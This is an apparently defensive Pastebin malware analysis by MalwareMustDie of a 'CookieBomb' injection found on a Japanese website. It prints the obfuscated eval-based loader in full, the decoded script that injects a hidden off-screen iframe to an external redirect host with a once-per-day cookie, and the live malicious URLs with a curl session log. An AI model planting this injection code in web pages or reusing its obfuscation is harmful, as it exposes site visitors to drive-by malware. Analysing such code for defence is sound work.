SHARE
TWEET

CookieBomb check pad

MalwareMustDie Feb 26th, 2014 397 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. /-- Case Info ---/
  2.  
  3. Case: Cookiebomb
  4. By: @unixfreaxjp
  5. Date: Thu Feb 27 00:43:31 JST 2014
  6.  
  7. /--- malware download source ---/
  8.  
  9. http://lily-tokyo.jp/
  10.  
  11. /--- the code---/
  12.  
  13. </div><!--2d3965--><script type="text/javascript" language="javascript">                                                                                                                                                                                                                                                          oirydv="s"+"p"+"l"+"i"+"t";tmzm=window;rwbe=document;shfai="0"+"x";psfn=(5-3-1);try{++(rwbe.body)}catch(imr){ounc=false;try{}catch(imreq){ounc=21;}if(1){orva="17:5d:6c:65:5a:6b:60:66:65:17:67:6b:63:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:67:6b:63:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:67:6b:63:25:6a:69:5a:17:34:17:1e:5f:6b:6b:67:31:26:26:5b:5c:6d:66:6b:60:58:25:65:63:26:5a:63:60:62:25:67:5f:67:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:6a:66:63:6c:6b:5c:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:17:1e:2c:2d:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:2c:2d:67:6f:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:2c:2d:67:6f:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:27:2c:2d:1e:32:4:1:17:67:6b:63:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:2c:2d:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:6b:63:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:67:6b:63:53:1e:17:5a:63:58:6a:6a:34:53:1e:67:6b:63:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:67:6b:63:1e:20:25:58:67:67:5c:65:5b:3a:5f:60:63:5b:1f:67:6b:63:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:67:6b:63:27:30:1f:20:32:4:1:74:4:1:74"[oirydv](":");}tmzm=orva;imrzo=[];for(tcees=22-20-2;-tcees+1380!=0;tcees+=1){thtd=tcees;if((0x19==031))imrzo+=String.fromCharCode(eval(shfai+tmzm[1*thtd])+0xa-psfn);}epep=eval;epep(imrzo)}</script><!--/2d3965-->
  14.  
  15. /--- obduscation design ---/
  16.  
  17. oirydv = "s" + "p" + "l" + "i" + "t";
  18. tmzm = window;
  19. rwbe = document;
  20. shfai = "0" + "x";
  21. psfn = (5 - 3 - 1);
  22. try {
  23.     ++(rwbe.body)
  24. } catch (imr)
  25.     {
  26.     ounc = false;
  27.     try {} catch (imreq)
  28.                {
  29.            ounc = 21;
  30.            }
  31.     if (1) {
  32.         orva = "17:5d:6c:65:5a:6b:60:66:65:17:67: […] 30:1f:20:32:4:1:74:4:1:74" [oirydv](":");
  33.            }
  34.     tmzm = orva;
  35.     imrzo = [];
  36.     for (tcees = 22 - 20 - 2; - tcees + 1380 != 0; tcees += 1) {
  37.         thtd = tcees;
  38.         if ((0x19 == 031)) imrzo += String.fromCharCode(eval(shfai + tmzm[1 * thtd]) + 0xa - psfn);
  39.     }
  40.     epep = eval;
  41.     epep(imrzo)
  42. }
  43.  
  44. /--- session ---/
  45.  
  46. #request# GET http://lily-tokyo.jp/
  47. Grequest# GET http://lily-tokyo.jp/image-1/top.jpg
  48. #request# GET http://devotia.nl/clik.php
  49. #request# GET http://devotia.nl/templates/system/css/error.css
  50. #request# GET http://lily-tokyo.jp/favicon.ico#-moz-resolution=16,16
  51. #request# GET http://lily-tokyo.jp/favicon.ico
  52. #request# GET http://lily-tokyo.jp/
  53.  
  54. /--- executed scripts ---/
  55.  
  56. function ptl09() {
  57.     var static = 'ajax';
  58.     var controller = 'index.php';
  59.     var ptl = document.createElement('iframe');
  60.     ptl.src = 'http://devotia.nl/clik.php';
  61.     ptl.style.position = 'absolute';
  62.     ptl.style.color = '56';
  63.     ptl.style.height = '56px';
  64.     ptl.style.width = '56px';
  65.     ptl.style.left = '100056';
  66.     ptl.style.top = '100056';
  67.  
  68.     if (!document.getElementById('ptl')) {
  69.         document.write('<p id=\'ptl\' class=\'ptl09\' ></p>');
  70.         document.getElementById('ptl').appendChild(ptl);
  71.     }
  72. }
  73.  
  74. function SetCookie(cookieName, cookieValue, nDays, path) {
  75.     var today = new Date();
  76.     var expire = new Date();
  77.     if (nDays == null || nDays == 0) nDays = 1;
  78.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  79.     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  80. }
  81.  
  82. function GetCookie(name) {
  83.     var start = document.cookie.indexOf(name + "=");
  84.     var len = start + name.length + 1;
  85.     if ((!start) &&
  86.         (name != document.cookie.substring(0, name.length))) {
  87.         return null;
  88.     }
  89.     if (start == -1) return null;
  90.     var end = document.cookie.indexOf(";", len);
  91.     if (end == -1) end = document.cookie.length;
  92.     return unescape(document.cookie.substring(len, end));
  93. }
  94. if (navigator.cookieEnabled) {
  95.     if (GetCookie('visited_uq') == 55) {} else {
  96.         SetCookie('visited_uq', '55', '1', '/');
  97.         ptl09();
  98.     }
  99. }
  100.  
  101. /---- getting the access ---/
  102.  
  103. Source: http://devotia.nl/clik.php
  104.  
  105. var cookieName = 'visited_uq';
  106. var cookieValue = '55';
  107. var path = '/';
  108. var nDays = 1;
  109. var today = new Date();
  110. var expire = new Date();
  111. expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  112. var expires = expire.toGMTString();
  113. var documentcookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  114. document.write (documentcookie);
  115.        
  116. /---- Cookie Output ---/
  117.  
  118. visited_uq=55;expires=Thu, 27 Feb 2014 15:36:52 GMT; path=/
  119.  
  120. /--- Cookie Access ---/
  121.  
  122. * About to connect() to devotia.nl port 80 (#0)
  123. *   Trying 82.150.140.70...
  124. * connected
  125. * Connected to devotia.nl (82.150.140.70) port 80 (#0)
  126. > GET /clik.php HTTP/1.1
  127. > User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
  128. > Host: devotia.nl
  129. > Accept:/
  130. > Referer: http://lily-tokyo.jp/
  131. > Cookie: visited_uq=55;expires=Thu, 27 Feb 2014 15:36:52 GMT; path=/
  132. >
  133. < HTTP/1.1 404 Artikel niet gevonden
  134. < Date: Wed, 26 Feb 2014 15:43:43 GMT
  135. < Server: Apache/2.2.0 (Fedora)
  136. < X-Powered-By: PHP/5.3.27
  137. < P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
  138. < Cache-Control: no-cache
  139. < Pragma: no-cache
  140. < Set-Cookie: 9ab012d8cf17e9055073fbb47bff0246=c460997d447e66a2ed5a98526be443aa; path=/
  141. < X-Powered-By: PleskLin
  142. < Connection: close
  143. < Transfer-Encoding: chunked
  144. < Content-Type: text/html; charset=utf-8
  145. <
  146. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  147. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="nl-nl" lang="nl-nl" dir="ltr">
  148. <head>
  149.         <title>404 - Fout: 404</title>
  150.         <link rel="stylesheet" href="/templates/system/css/error.css" type="text/css" />
  151.         </head>
  152. <body>
  153.         <div class="error">
  154.                 <div id="outline">
  155.                 <div id="errorboxoutline">
  156.                         <div id="errorboxheader">404 - Artikel niet gevonden</div>
  157.                         <div id="errorboxbody">
  158.                         <p><strong>Mogelijk kunt u deze pagina niet bezoeken wegens:</strong></p>
  159.                                 <ol>
  160.                                         <li>een <strong>verouderde bladwijzer/favoriet</strong></li>
  161.                                         <li>een zoekmachine heeft een <strong>verouderde lijst van deze website</strong></li>
  162.                                         <li>een <strong>fout getypt adres</strong></li>
  163.                                         <li>u heeft <strong>geen toegang</strong> tot deze pagina</li>
  164.                                         <li>De gegeven bron is niet gevonden.</li>
  165.                                         <li>Er is een fout opgetreden tijdens het verwerken van uw verzoek.</li>
  166.                                 </ol>
  167.                         <p><strong>Probeer één van de volgende pagina's:</strong></p>
  168.  
  169.                                 <ul>
  170.                                         <li><a href="/index.php" title="Naar de startpagina">Startpagina</a></li>
  171.                                 </ul>
  172.  
  173.                         <p>Als de problemen blijven bestaan, neem dan aub contact op met de systeembeheerder van deze website en rapporteer de onderstaande fout..</p>
  174.                         <div id="techinfo">
  175.                         <p>Artikel niet gevonden</p>
  176.                         <p>
  177.                                                         </p>
  178.                         </div>
  179.                         </div>
  180.                 </div>
  181.                 </div>
  182.         </div>
  183. </body>
  184. </html>
  185. * Closing connection #0
  186. sh-3.2$
  187.  
  188. #MalwareMustDie!!
RAW Paste Data
Top